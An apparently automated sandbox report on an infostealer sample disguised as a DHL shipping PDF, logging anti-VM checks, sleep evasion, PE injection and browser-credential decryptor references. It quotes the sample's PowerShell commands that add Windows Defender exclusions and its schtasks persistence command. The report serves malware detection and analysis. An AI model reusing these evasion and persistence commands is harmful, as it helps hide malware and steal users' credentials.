Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6808, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PZgkJsntUXo.exe PID: 6160, type: MEMORYSTR

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory allocated: 4A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory allocated: A260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory allocated: B260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory allocated: B4D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory allocated: C4D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory allocated: D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory allocated: 2730000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory allocated: 1850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory allocated: 3200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory allocated: 5200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory allocated: 9590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory allocated: 7F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory allocated: A590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory allocated: B590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory allocated: 1640000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory allocated: 3080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory allocated: 2E80000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4800	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 677	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7190	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1096	Jump to behavior

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe TID: 6860	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2012	Thread sleep count: 4800 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4716	Thread sleep count: 677 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4140	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5440	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3616	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe TID: 5040	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5268	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: PZgkJsntUXo.exe, 0000000D.00000002.2176124886.00000000013B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
Source: PZgkJsntUXo.exe, 00000009.00000002.1008266608.0000000007570000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.968859605.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000008.00000002.2175954247.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: svchost.exe, 0000000F.00000002.2179668901.000001799D04D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2177907110.0000017997A2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Code function: 8_2_00D6C168 LdrInitializeThunk,LdrInitializeThunk,

8_2_00D6C168

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b20f38.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe"
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Memory written: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Memory written: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp2454.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PZgkJsntUXo" /XML "C:\Users\user\AppData\Local\Temp\tmp3358.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Process created: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe "C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
